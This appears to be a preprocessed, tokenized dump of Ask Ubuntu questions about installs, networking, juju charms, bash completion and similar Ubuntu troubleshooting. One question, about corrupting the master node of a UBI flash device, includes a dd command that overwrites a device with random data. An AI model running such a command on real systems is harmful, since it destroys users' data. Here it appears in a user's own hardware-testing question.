507619	slow performance after wubi install of unbuntu 14 with xp	i had an old xp pc that did n't seem like a good candidate for partitioning - various unmovable files and files that could n't be defragmented . pentium 4 , 2.79 ghz , 1 gb ram , about 30 gb free before install . so , i tried wubi . i found a version that installed ubuntu 14.04 ( 32-bit ) . someone said wubi does n't work with 14 , but i have it up . i made this change to fix an error that prevented it from running `` normally '' : replaced ro with rw in this line : linux /boot/vmlinuz-3.13.0-24-generic root=uuid=aac884ac1f144321 loop=/ubuntu/disks/root.disk ro quiet splash $ vt_handoff it runs well enough , but seems extremely slow . did i do the wrong type of install ? is there something i can tweak ? i did n't find anything to remove from the startup applications . i am relatively experienced with ms windows and dos ( i am comfortable with command-line ) , but not linux . thanks edited to add : i read that lubuntu and xbuntu current versions wo n't work with wubi . if that 's not true , please direct me ! update : maybe partitioning is the way ( after another attempt at defragging ) -- what 's best to use ?
507620	how do i get the old lock screen in 14.04 ?	is it possible to revert to the old ( 12.04-13.xx ) lock screen from the current unity lock screen in ubuntu ? if so , how can i do it from the terminal ? i have to script this change across 200+ computers , so a non-gui method is highly preferred . the new lock screen is buggy and a pain to use in multi-user environments : the unity lock screen is n't playing well with ldap . often it gives an invalid password error , and the user has to use switch accounts action ( from the gear menu ) to get to lightdm and then log in , which always works fine . a known bug , apparently . i ca n't find any quick way to use the switch accounts action . in the lightdm version , there would be a switch accounts button which was only a couple of tab presses away . if some user leaves his pc without logging off , everytime the screen locks , that user 's lock screen is shown , forcing other users to use the switch accounts action from the gear menu ( for which keyboard shortcuts are not readily apparent ) to unlock their sessions . a couple of iterations more , and the unity lock screen might start working fine , but for now , any scriptable way to get back to the old way is highly appreciated . i am aware of the ccsm way , and it will be a last-resort action . let me stress : the bugs are irrelevant to me . reporting and solving them can be done in good time , after i have got the old one back .
507623	wget ( or something ) to get total size of directory ?	i would like to know the total size of the ubuntu repositories here : http : //ubuntu.uni-klu.ac.at/ubuntu/pool/ . is there a command that i can use ( perhaps involving wget ) that queries the total size of all files inside this directory , without downloading them ?
507625	why is ext3 being used as disk format for most of linux and ubuntu and not other file systems	can anyone explain why is ext4 , ext3 or ext2 disk formats that have been used in ubuntu as default and not others . are there any advantages or disadvantages over other ? if so , what ?
507626	how can i make my pc hibernate when idle ? 14.04	i see that this was asked some time ago for 11.04 . the answer there did n't help since the answer used gconf-editor to find a key called /apps/gnome-power-manager/actions/ , which does n't exist when i look in my install of 14.04 . this setting must be stored somewhere else ?
507628	how to update `` /usr/arm-linux-gnueabi/include/ '' libraries on ubuntu 12.04 lts ?	a ubuntu 12.04 lts platform is been used to develop embedded linux software for arm cortex-a8 hardware platform ( beaglebone black ) . to communicate on the i2c bus on target device , it is recommended to use i2c_smbus_ functions to communicate on the i2c bus . when i2c_smbus functions such as i2c_smbus_read_word_data are referenced in software for the target arm cortex-a8 processor errors such as ‘i2c_smbus_read_word_data’ was not declared in this scope are generated at compile . it appears that the following header files indicate that they are dated . /usr/arm-linux-gnueabi/include/linux/i2c.h /usr/arm-linux-gnueabi/include/linux/i2c-dev.h also in that following reference i2c.h file has all the i2c_smbus defined . how can all arm-linux-gnueabi libraries be updated ? research references using i2c from userspace in linux i2c communication from linux userspace – part ii i2c dev interface
507629	enabled speech dispatcher , now running in low graphics mode !	all . i 'm running ubuntu 13.04 on an hp pavilion . i noticed the sound had stopped working randomly . i googled this , and someone said to enable speech dispatcher and reboot . i did this , but now all that 's happening is it 's running in low graphics mode ! can anyone please help me and explain how to fix this ?
507630	hp photosmart premium c410b / ubuntu / scanner function	is there an easy way to make the scanner function of my hp photosmart premium c410 work in ubuntu 14.04 ? the printer is connected by wifi through a wireless router . the basic printing function works perfectly through > system settings > printers where the printer driver was set up however , the scanning features are not shown to be available , only the print queue and basic settings . the following links i have found provide no solution : how do i make the scanner function of my hp photosmart d110 work ? wifi connection to scanner not working i have checked compatibility with the hp website and both ubuntu 14.04 and the printer are compatible with each other . it suggests that the hplip version version downloaded with v14.04 will be the currently available one . it all works perfectly fine from a laptop ( windows 7 ) on the same router .
507632	badly installed ubuntu 14.04	today , i have decided to make a new partition of my hdd and then to install ubuntu 14.04 . i have already had windows installed on another partition . i installed ubuntu and the installation has been finished successfully . after rebooting the system , the os selection screen did n't come up , and it started to boot windows immediately with an error . so i could n't boot windows , because i have probably rewritten some of the system data . then i have tried to change the boot sequence to boot at ubuntu . i can boot ubuntu from the usb now , and the ubuntu data are saved on the hdd . however , i 'm still not able to boot it without the usb flash disk plugged in . another problem is that anything i change does not save and when i reboot ubuntu it 's gone . for example i have to download vlc every time i run the laptop . i do n't expect you to help me to run windows because i am pretty sure that i ca n't do that without the installation cd but i would be glad if you could tell me how to make ubuntu bootable even without the usb plugged in and how to fix the not saving settings issue . this is what i get when i write this prompt : sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x9fd8fea1 device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs partition 1 does not start on physical sector boundary . /dev/sda2 * 2048 616447 307200 42 sfs /dev/sda3 616448 1009506303 504444928 42 sfs /dev/sda4 1009508350 1465147391 227819521 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 1009508352 1465147391 227819520 83 linux disk /dev/sdb : 4004 mb , 4004024320 bytes 32 heads , 63 sectors/track , 3879 cylinders , total 7820360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x16c32dd7 device boot start end blocks id system /dev/sdb1 * 63 7820063 3910000+ b w95 fat32 ubuntu @ ubuntu : ~ $ ^c ubuntu @ ubuntu : ~ $ thanks for your help .
507636	allow chown command to www-data user	is there a way to allow chown command to be run by www-data but limiting it in a way that the files owner can be changed only to uids greator than that of www-data user ? i already researched a lot and only way to allow chown to be run by any other user than root requires to give sudo privileges to that user but that is not an option for me until i can make sure that the owner is not set to any user with smaller uid than www-data . to give the context , i am creating an app where i am trying to simulate hosting by creating a new linux user for each signed up user . the user can then upload files but i need to change the owner of these files to the corresponding linux user .
507638	temporarily enable nvidia/optirun for everything	i was curious if there was a way to temporarily enable the nvidiacard/optirun for everything , or atleast all new applications launched . i would even be happy if i could change some setting and then restart x and have it all work with the nvidia card . i guess what i am asking for is if there is any hybrid between bumblebee and nvidia prime , where on average i manually select what apps i want to run on the nvidia card , but with the option or enabling it for everything from time to time . is such a thing possible ?
507639	how do i use fastcgi with the apache2 charm ?	i need use mod-fastcgi , how i can config with the juju precise apache2 ? i use : juju set apache2 enable_modules=fastcgi return by juju debug-log : unit-apache2-1 : 2014-08-06 01:37:42 info config-changed e : package 'libapache2-mod-fastcgi ' has no installation candidate unit-apache2-1 : 2014-08-06 01:37:42 info juju-log installing module fastcgi failed unit-apache2-1 : 2014-08-06 01:37:42 info config-changed module status disabled . unit-apache2-1 : 2014-08-06 01:37:42 info config-changed to activate the new configuration , you need to run : unit-apache2-1 : 2014-08-06 01:37:42 info config-changed service apache2 restart
507640	how to fix : unity dash does not find a program which is listed in unity dash programs ?	it seems as a random bug . open unity dash . search for a program ( skype or minitube for me ) . no results and searching is finished ( no loading icon ) . repeats no more after opening the program from programs list in unity dash . open desired program from unity dash applications tab . search again . there it is , able to be found , no more ashamed ...
507641	chown not responding as i expected .	new to ubuntu , so bare with me . i recently changed the permission of mysql , /var/lib/mysql so i could save a database in it manually ( was only option currently , instead of importing it the proper way ) . to do so i had to change the permissions from username : mysql server and group : mysql . when i tried to change it back i got this error : chown : invalid user : âmysqlâ ... where to now ?
507644	unable to install anything on ubuntu 14.04	whenever i try to run any apt-get command , it gives me this error message : dpkg : error : corrupt info database format file '/var/lib/dpkg/info/format' e : sub-process /usr/bin/dpkg returned an error code ( 2 ) please advice how to rectify this .
507646	looking for a native pdf reader with xfa support	i am looking for a ( under ubuntu 14.04 ) native pdf reader which is able to handle xfa . it does n't has to do much more than display and print them correctly ( filling out forms would be a plus ) but that 's it ( i.e . i do n't care if i can make annotations , bookmarks or anything else ) . i would like to avoid wine for some ( unrelated ) reasons , otherwise i would use pdf-xchange . usually i am using evince or okular but they can not handle xfa . acrobat reader will not be continued any more , is therefore also not a good option . thanks !
507648	spamassissin not showing up in evolution plugins	i upgraded to the new evolution mail for my work & have installed spamassasin . however , the plugin is not showing up in the list . how do i make evolution recognize the app ?
507649	ubuntu can not ping host name but can ping ip ?	well i just went into the ubuntu world for administration . i found similar threads , except , i am able to ping my own host name and ip address and my windows can ping my linux host name , but ubuntu can not ping the windows hostname . problem : i have 4 windows computers and i have 1 ubuntu computer my windows computer can ping ubuntu computer by hostname and by ip address . also , net view ( cmd prompt ) displays the host name of ubuntu computer . ubuntu computer can only ping by ip address only not by hostname . i installed samba as well . ubuntu computer can ping itself by ip address and by hostname i can use arp command and will display all the computers ip on the network , but only by ip address . how is it that i can only ping by ip address and not by hostname to the windows computers ? but ubuntu can ping itself by ip address and hostname and windows computers can ping ubuntu by hostname as well ?
507650	do i have to download both the 14.04 and the 14.04.1 versions of ubuntu ?	in the release page of ubuntu , i see that both the 14.04.1 and the 14.04 versions are offered for download . do i need them both ? that is , is 14.04 a prerequisite for installing 14.04.1 ? or can i just download the last version ubuntu-14.04.1-desktop-amd64.iso ?
507652	shell gives no prompt if auto completion is enabled ( blinking cursor instead )	i tryed to enable shell autocompletion uncommenting the following lines in my .bashrc : # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi however , this have a side effect . even though autocomplete seems to work , when i open a new terminal , only a blinking cursor is presented : i am returned to the usual user @ machine : ~ $ prompt only after pressing ctrl+c . the normal behavior is restored if i comment the above lines ( but no autocompletion any more ) . i ca n't figure out what the problem is . -- update 1 -- here 's what the code does : -- update 2 -- here 's the output of the suggested commands . somethings keeps looping and the terminal is flooded by the ouptut . ++++++ : /etc/bash_completion.d ++++++ readonly bash_completion_compat_dir ++++++ _blacklist_glob= ' @ ( acroread.sh ) ' ++++++ shopt -s extglob progcomp ++++++ complete -d pushd ++++++ complete -u write chfn groups slay w sux runuser ++++++ complete -a stopped -p ' '' % ' -s ' '' ' bg ++++++ complete -j -p ' '' % ' -s ' '' ' fg jobs disown ++++++ complete -v readonly unset ++++++ complete -a setopt set ++++++ complete -a shopt shopt ++++++ complete -a helptopic help ++++++ complete -a unalias ++++++ complete -a binding bind ++++++ complete -c command type which ++++++ complete -b builtin ++++++ [ [ linux-gnu == * @ ( solaris|aix ) * ] ] ++++++ [ [ linux-gnu == * @ ( solaris|aix ) * ] ] ++++++ [ [ linux-gnu == * @ ( solaris|aix ) * ] ] ++++++ _backup_glob= ' @ ( # * # |* @ ( ~| . @ ( bak|orig|rej|swp|dpkg*|rpm @ ( orig|new|save ) ) ) ) ' ++++++ complete -f _service service ++++++ _sysvdirs ++++++ sysvdirs= ( ) ++++++ [ [ -d /etc/rc.d/init.d ] ] ++++++ [ [ -d /etc/init.d ] ] ++++++ sysvdirs+= ( /etc/init.d ) ++++++ [ [ -f /etc/slackware-version ] ] ++++++ for svcdir in ' $ { sysvdirs [ @ ] } ' ++++++ for svc in ' $ svcdir/ ! ( $ _backup_glob ) ' ++++++ [ [ -x /etc/init.d/acpid ] ] ++++++ complete -f _service /etc/init.d/acpid ++++++ for svc in ' $ svcdir/ ! ( $ _backup_glob ) ' ++++++ [ [ -x /etc/init.d/anacron ] ] ++++++ complete -f _service /etc/init.d/anacron ++++++ for svc in ' $ svcdir/ ! ( $ _backup_glob ) ' ++++++ [ [ -x /etc/init.d/apparmor ] ] -- update 3 -- here 's the requested output : ac @ ac : ~ $ grep -r bash_completion /etc/bash_completion.d /etc/bash_completion.d/bash.bashrc : # if [ -f /usr/share/bash-completion/bash_completion ] ; then /etc/bash_completion.d/bash.bashrc : # . /usr/share/bash-completion/bash_completion /etc/bash_completion.d/bash.bashrc : # elif [ -f /etc/bash_completion ] ; then /etc/bash_completion.d/bash.bashrc : # . /etc/bash_completion /etc/bash_completion.d/bash.bashrc.bak : # if [ -f /usr/share/bash-completion/bash_completion ] ; then /etc/bash_completion.d/bash.bashrc.bak : # . /usr/share/bash-completion/bash_completion /etc/bash_completion.d/bash.bashrc.bak : # elif [ -f /etc/bash_completion ] ; then /etc/bash_completion.d/bash.bashrc.bak : # . /etc/bash_completion /etc/bash_completion.d/inkscape : # put this file in /etc/bash_completion.d/ /etc/bash_completion.d/desktop-file-validate : # put this file in /etc/bash_completion.d/ /etc/bash_completion.d/bash_completion~ : . /usr/share/bash-completion/bash_completion /etc/bash_completion.d/git-completion.bash : # bash_completion - programmable completion functions for bash 3.2+ /etc/bash_completion.d/libreoffice.sh : # programmable bash_completion file for the main office applications /etc/bash_completion.d/bash_completion : # . /usr/share/bash-completion/bash_completion indeed the last line shows what you predicted . but i do n't know what to do with that file : should i delete it , or i mistakenly overwrote it ? if so , what was the original content ?
507654	how to launch windows on default and linux by choice ?	i 'm using windows for everything , but i want to check and learn linux also . my computer is also used by my family . is there any possibility to run windows by default ( without any choosing ) and ubuntu on demand ( for example when i click f6 or something like that on startup ) ? edit : any of the answers do n't work for me ( new version of ubuntu ) . anyone ?
507655	mounting windows phone 8.1 on ubuntu 14.04	n00b here ! i 've recently installed ubuntu on my computer , erasing windows vista forever . so far so good , i love the os ! the only issue for me is my mobile phone , a nokia lumia with windows phone . sometimes it works ( when it does , it behaves like a usb memory stick ) , sometimes it does n't . when it does n't , ubuntu shows me this : unable to access “nokia lumia 820 ( rm 825 ) ” and mtp : host= % 5busb % 3a002 % 2c024 % 5d” could not be found . perhaps it has recently been deleted . what 's going on and how can i fix this ? thanks ! !
507659	how do i install srilm on ubuntu 14.04 ?	srilm is a tool for language modelling in natural language processing ( nlp ) , http : //www.speech.sri.com/projects/srilm/ there is no clear installation guide to install srilm on ubuntu 14.04 . there was one for 11.10 but it is outdated and it does n't work properly . http : //www.spencegreen.com/2012/02/01/installing-srilm-on-ubuntu-11-10/ does anyone know how to install srilm on ubuntu 14.04 ?
507665	installation with windows 8.1	i have already created my bootable flash drive and checked out ubuntu . i want to install it along side my windows 8.1 pro . i have a 1 terabyte hard drive . on this drive i have a 2 windows partitions and 195 gigabyte partition . when i run the installation it does not see any partitions at all and just sees the whole drive as being free space . i tried making a volume of my 195 gig free space and got the same result . i need to have windows 8 on my hard drive , what am i missing that the installation program does not see any partitions but just 1 terabyte free ? thanks in advance !
507668	what 's the same program `` reconstructor '' ?	program `` reconstructor '' does n't work . please tell me program like this ? http : //en.wikipedia.org/wiki/reconstructor
507672	ca n't find armhf package in apt-get , can find in ubuntu site	i 'm trying to install owncloud on cubietruck , with armhf architecture . when looking in ubuntu package site , it 's listed as `` all '' architecture . when running apt-cache show owncloud | grep architecture on my x64 pc , i see architecture : all as well . when trying to find the package in my cubietruck , i ca n't find it . root @ cubie : ~ $ apt-get install owncloud reading package lists ... done building dependency tree reading state information ... done e : unable to locate package owncloud output of apt-cache policy : package files : 100 /var/lib/dpkg/status release a=now 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-security/restricted translation-en 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-security/main translation-en 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-security/restricted armhf packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=restricted origin ports.ubuntu.com 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-security/main armhf packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=main origin ports.ubuntu.com 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-updates/restricted translation-en 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-updates/main translation-en 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-updates/restricted armhf packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=restricted origin ports.ubuntu.com 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty-updates/main armhf packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=main origin ports.ubuntu.com 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty/restricted translation-en 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty/main translation-en 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty/restricted armhf packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=restricted origin ports.ubuntu.com 500 http : //ports.ubuntu.com/ubuntu-ports/ trusty/main armhf packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=main origin ports.ubuntu.com pinned packages : am i missing something ?
507674	ubuntu rename command regex not working	i 'm trying to use the rename command to rename a bunch of images in a folder . i have this list of images , image.php ? x=10 image.php ? x=25 image.php ? x=50 image.php ? x=75 i 'm trying to rename them to 10.png , 25.png etc . using this regex : $ rename `` s/image\.php\ ? x\= ( . * ) / $ 1\.png/g '' * this regex works fine in for example sublime text , all the matches are replaced correctly ... but when i run the rename command like this , with $ 0 it says bash.png already exists and with $ 1 it says .png already exists , so nothing was saved ! wat do ?
507675	i 'm getting the notificaiton to update to 14.04 but it says theres no new release . what gives !	when i first log in i see this http : //screencloud.net/v/feqm : ~ $ ssh root @ [ redacted ] ubuntu 12.04.5 lts welcome to ubuntu 12.04.5 lts ( gnu/linux 3.8.0-29-generic x86_64 ) * documentation : https : //help.ubuntu.com/ system information as of wed aug 6 11:32:38 edt 2014 system load : 0.37 processes : 110 usage of / : 5.3 % of 37.17gb users logged in : 0 memory usage : 12 % ip address for eth0 : [ redacted ] swap usage : 0 % graph this data and manage this system at : https : //landscape.canonical.com/ your current hardware enablement stack ( hwe ) is going out of support on 2014-08-07 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . for more information , please see : http : //wiki.ubuntu.com/1204_hwe_eol to upgrade to a supported ( or longer supported ) configuration : * upgrade from ubuntu 12.04 lts to ubuntu 14.04 lts by running : sudo do-release-upgrade or * install a newer hwe version by running : sudo apt-get install linux-generic-lts-trusty linux-image-generic-lts-trusty and reboot your system . when i run sudo do-release-upgrade i end up getting this . root @ glass : ~ # sudo do-release-upgrade checking for a new ubuntu release no new release found root @ glass : ~ # so far i 've tried to replace the sources.list with a list from another server i 'm running with another datacenter . but i 'm sure i 'm just missing something simple / obvious . the vps provider i 'm running this with is kind of new so they have a lot of growing pains that i have to live through so this may also be part of the issue .
507680	alt-tab works only for the current active application on 14.04 gnome+metacity	i 've just installed a fresh 14.04 , i use gnome with metacity , ( after trying compiz ... ) but i ca n't get the alt+tab keyboard to have the standard behaviour . when i use it , it only displays the windows of a given application , fox example if i have 3 firefox opened windows , but all the other applications are ignored and not included . before using metacity i tried modifying several compiz settings , i am wondering if it can be related . moreover , when trying to access the metacity options , gconf-editor /apps/metacity , the path is not found /apps/metacity there is nothing at all . and i ca n't find the short-cut in the keyboard settings : edit 7/8 : i have found that super+tab does exactly what i want , but i ca n't find it in the keyborad shortcuts.. how can i modify it ?
507682	ca n't log in encrypted ntfs after ubuntu install	i had this windows laptop which when i booted would ask me for a username and my password in some windoish looking security environment before logging me into the windows os . i went inside windows , made the partition smaller . i booted into ubuntu live on a usb stick and installed ubuntu on the remaining space ( the space where some of the original ntfs was ) . now ubuntu works fine and i can see the ntfs partition aside it with gparted . however i ca n't mount it and when i boot the laptop there is no windows option - only ubuntu . any idea what happened ? can i fix this ?
507683	security issues in hotspot	i list the device connected through ap-hotspot with arp -a can i have following privilege over the device connected in my hotspot* : disabling the device connected to my hotspot i.e assuming three device a , b , c connected in the hotspot can i remove say device b ( because device b got my password without my knowledge . )
507684	trying to install yeoman on ubuntu to use with nodejs and npm	using ubuntu 13.10 i am trying to install yeoman using sudo npm install -g yo but it does n't seem to work globally both npm and nodejs are installed , however , i am not sure that they are installed correctly for use globally . i can not use npm i have to use sudo npm to install node js i used $ sudo apt-get install python-software-properties $ sudo apt-add-repository ppa : chris-lea/node.js $ sudo apt-get update $ sudo apt-get install nodejs when i use sudo npm install -g yo the output i get is /usr/bin/yo - > /usr/lib/node_modules/yo/cli.js > yo @ 1.2.1 postinstall /usr/lib/node_modules/yo > node ./scripts/doctor [ yeoman doctor ] everything looks alright ! yo @ 1.2.1 /usr/lib/node_modules/yo ├── is-root @ 0.1.0 ├── fullname @ 0.1.1 ├── opn @ 0.1.2 ├── async @ 0.9.0 ├── shelljs @ 0.3.0 ├── lodash @ 2.4.1 ├── multiline @ 0.3.4 ( strip-indent @ 0.1.3 ) ├── sudo-block @ 0.4.0 ( chalk @ 0.4.0 ) ├── nopt @ 3.0.1 ( abbrev @ 1.0.5 ) ├── chalk @ 0.5.1 ( escape-string-regexp @ 1.0.1 , ansi-styles @ 1.1.0 , supports- color @ 0.2.0 , strip-ansi @ 0.3.0 , has-ansi @ 0.1.0 ) ├── string-length @ 0.1.2 ( strip-ansi @ 0.2.2 ) ├── findup @ 0.1.5 ( commander @ 2.1.0 , colors @ 0.6.2 ) ├── yosay @ 0.3.0 ( ansi-regex @ 0.2.1 , pad-component @ 0.0.1 , ansi-styles @ 1.1.0 , word- wrap @ 0.1.3 , strip-ansi @ 0.2.2 , minimist @ 0.2.0 , chalk @ 0.4.0 , taketalk @ 0.1.1 ) ├── update-notifier @ 0.2.0 ( semver-diff @ 0.1.0 , latest-version @ 0.2.0 , configstore @ 0.3.1 ) ├── insight @ 0.3.1 ( object-assign @ 0.1.2 , chalk @ 0.4.0 , async @ 0.2.10 , lodash.debounce @ 2.4.1 , inquirer @ 0.4.1 , request @ 2.27.0 , configstore @ 0.2.3 ) └── yeoman-generator @ 0.17.2 ( dargs @ 0.1.0 , github-username @ 0.1.1 , diff @ 1.0.8 , class-extend @ 0.1.1 , rimraf @ 2.2.8 , chalk @ 0.4.0 , text-table @ 0.2.0 , mime @ 1.2.11 , isbinaryfile @ 2.0.1 , debug @ 1.0.4 , grouped-queue @ 0.3.0 , mkdirp @ 0.5.0 , underscore.string @ 2.3.3 , glob @ 4.0.5 , iconv-lite @ 0.2.11 , findup-sync @ 0.1.3 , file- utils @ 0.2.0 , download @ 0.1.18 , cheerio @ 0.17.0 , request @ 2.39.0 , gruntfile- editor @ 0.1.1 , inquirer @ 0.5.1 ) so it appears that yeoman is installed correctly but that it is n't working - when i type yo nothing happens ... do i need to put yo in my $ path ? i 'm not really sure how to do that.. additionally , how do i configure npm so i do n't have to use sudo npm ?
507685	change default groups assigned to new users	when a new user is created , they are assigned to a set of default groups . how do i change which default groups are assigned ?
507689	w : gpg error : message in my terminal	i get this msg in my terminal w : gpg error : https : //download.01.org trusty inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a902dda375e52366 how do i get rid of it ? thanks
507692	completely remove windows 7 ult x64 w/o live cd ?	finally i want to ditch windows completely but after googling i found that to remove win7 from dual boot i 've to use live cd/usb , but i do n't want to download 700mb+ again . is there is any other way ?
507694	layer 2 bridge with tap interface	linux newb starting out . figuring it all out as i go along . im trying to layer 2 bridge a virtual tap interface and an etehrnet interface . want to achieve this . tap0 10.0.0.3/8 ===== > br0 ( layer 2 only ) ====== > eth2 ( layer 2 only ) ===== > external device connected to eth2 10.0.0.5/8 config as the following : sudo tunctl sudo ifconfig tap0 10.0.0.3 netmask 255.0.0.0 promisc up sudo ifconfig eth2 0.0.0.0 promisc up sudo brctl addbr br0 sudo brctl stp br0 off sudo brctl addif br0 tap0 sudo brctl addif br0 eth2 sudo ifconfig br0 0.0.0.0 up with tcp dump i cant see any traffic hitting tap0 . the only way i can get a ping from 10.0.0.5 to 10.0.0.3 to work is by adding a route to 10.0.0.5/0 with : sudo route add 10.0.0.5 br0 . ok thats fine it works , but im surprised i need to do it and that the tap interface isnt seeing traffic . i expected the bridge to forward the arp request to tap0 or reply on tap0 's behalf . have i missed something ? is adding the route the way to do it , or should it work at layer 2 with no routes ? tia .
507699	why does ubuntu not seem to release memory ?	i am working with apache2+php and other web server apps . i have monitor as session connecting to a web server . ram memory is full . but when disconnecting a session , it does not free the ram memory . i have monitor via free -m , and it show unreleased memory even with no session now connected . is there a solution ?
507701	12.04.5 installed without my knowledge	i went right from 12.04.4 to 12.04.5 today , which is alright , but unexpected . could someone please explain how this happened , and why ?
507702	how do i change available encodings in leafpad ?	leafpad in its save file dialog offers several encodings in a drop down list and a possibility to use any other encoding by entering its name via a keyboard . how can i change the encodings in the drop down list ?
507703	how do i corrupt the master node on a ubi device ?	i have an nand flash that appears as mtd and is attached to ubi and has 2 volume and want to know how to corrupt the master node in the ubi device . is it possible ? the documentation says the master node are on lebs 1 and 2 but i dont know how to directly corrupt those , i know how to corrupt volumes using ubiupdate vol but not how to do this . edit : already tried dd something like dd if=/dev/urandom of=/dev/ubi1 bs=126976 count=2 seek=1 where 126976 is the eraseblock size for my device , but it does n't work and gives me errors .
507705	how to find the name needed to launch app from terminal ?	i read several questions similar here , but none answered my question . for example i have vmware player installed , and i would like to launch it from terminal . vmware + tab gives me this list : vmware-authd vmware-gksu vmware-license-enter.sh vmware-rpctool vmware-user-suid-wrapper vmware-authdlauncher vmware-hgfsclient vmware-modconfig vmware-toolbox-cmd vmware-vmblock-fuse vmware-checkvm vmware-hgfsmounter vmware-mount vmware-uninstall vmware-xferlogs vmwarectrl vmware-installer vmware-networks vmware-unity-helper vmware-fuseui vmware-license-check.sh vmware-ping vmware-usbarbitrator so i guess it 's one of these i am supposed to launch , right ? some things i tried , but did n't give me good results : locate vmware , whereis vmware . is there some kind of general way ( using just terminal ) on how to find exact name needed to launch certain program ? i know usually it 's just typing program name , but as you can see in this case it does not work .
507707	how to add linuxmint repositories to ubuntu ?	i want to add some linuxmint packages to be installed in ubuntu 14.04lts . how can one add the linuxmint ( any version ) repositories to ubuntu ( any version ) ?
507709	white flash at ( before ) boot	do n't know if you experience this but it 's very , very annoying . i 'm using lubuntu 14.04.1 64 bit it 's a wubi install , but i do n't think that changes anything , since i 've seen it elsewhere . at boot , there 's a sequence of something like this : grub screen turns off screen turns on flashes white ( not a clean type of white , more a irregular video card buffer type of white ) boot screen ( plymouth ) i do n't mind the screen turning off during boot , but i hate the white flash . it looks so ugly , and it makes it seem that somethings wrong . how do i remove it ? thanks in advance .
507710	setting internet gateway	friends , i 'm stuck up with problem regarding to network configuration to make my ubuntu 14.04 server machine as internet gateway in a lan , and i am a relatively newbie in this regard . my scenario is as follows.isp address 59.x.x.10 isp gateway 59.x.x.1 ( as seen from modem router ) netmask 255.255.255.255 ( `` ) modem address : 192.168.1.1 i edited the /etc/network/interface file as : auto eth0 iface eth0 inet static address 59.x.x.10 netmask 255.255.255.255 gateway 59.x.x.1 network 59.x.x.0 broadcast 59.x.x.255 dns-nameservers 8.8.8.8 4.4.4.4 auto eth1 iface eth1 inet static address 192.168.1.2 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 now when i save and restart the service , i can not even ping to 192.168.1.1 or get internet connection from this server machine itself . i also tried to change gateway of eth0 to 192.168.1.1 , but no good . where am i wrong , ? do i have to make any particular changes to my broadband modem router ?
507713	upgrade with iso - user name , password , computer name	try a update from 12.04.4 to 14.04.1 by using the iso ( usb ) as i had a live session with 14.04.1 to test if it runs on my computer upgrade process detected 12.04 version but later in the install ask me for name , username , password and computer name . as i was doing an upgrade i did n't know what to do here . what is the suggest approach ? type the exact same info as used back in the 12.04 install ? just user name and password must match ? btw , i did cancel the wizard as i wanted to start the upgrade from my 12.04 install but the cancel left my 12.04 in a `` half upgrade '' state mess , which require me to do a fresh install . update : i 'm good with this system for now , but for next upgrade ( have other system ) what is the right approach here .
507716	how to give a juju charm a static ip address - wordpress	i have a wordpress charm installed via juju . in order for me to access this charm through public ip , i port forwarded the ip into my server 's public ip address . recently , the ip address of the wordpress changed and brought my site down . i figured , this is due to the fact that the juju charm is on dhcp rather than static ip address . is there a way to give the charm a satic ip address ? or is there any other way for me to deploy this charm ? i 'm using local . public-address used to be 10.0.3.15 for wordpress and now it changed to 10.0.3.158 environment : local machines : `` 0 '' : agent-state : started agent-version : 1.20.1.1 dns-name : localhost instance-id : localhost series : trusty state-server-member-status : has-vote `` 1 '' : agent-state : started agent-version : 1.20.1.1 dns-name : 10.0.3.32 instance-id : madfresco-local-machine-1 series : trusty hardware : arch=amd64 `` 2 '' : agent-state : started agent-version : 1.20.1.1 dns-name : 10.0.3.158 instance-id : madfresco-local-machine-2 series : precise hardware : arch=amd64 services : mysql : charm : cs : trusty/mysql-3 exposed : false relations : cluster : - mysql db : - wordpress units : mysql/0 : agent-state : started agent-version : 1.20.1.1 machine : `` 1 '' public-address : 10.0.3.32 wordpress : charm : cs : precise/wordpress-25 exposed : true relations : db : - mysql loadbalancer : - wordpress units : wordpress/0 : agent-state : started agent-version : 1.20.1.1 machine : `` 2 '' open-ports : - 80/tcp public-address : 10.0.3.158 not too sure if this will help but i found these machine logs : 2014-08-06 08:14:10 error juju.state.api.watcher watcher.go:68 error trying to stop watcher : connection is shut down 2014-08-06 08:14:10 error juju.state.api.watcher watcher.go:68 error trying to stop watcher : connection is shut down 2014-08-06 08:14:11 error juju.worker runner.go:207 fatal `` deployer '' : connection is shut down 2014-08-06 08:14:11 error juju.worker runner.go:207 fatal `` upgrader '' : connection is shut down 2014-08-06 08:14:11 error juju.worker runner.go:207 fatal `` 2-container-watcher '' : connection is shut down 2014-08-06 08:14:11 error juju.worker runner.go:207 fatal `` authenticationworker '' : connection is shut down 2014-08-06 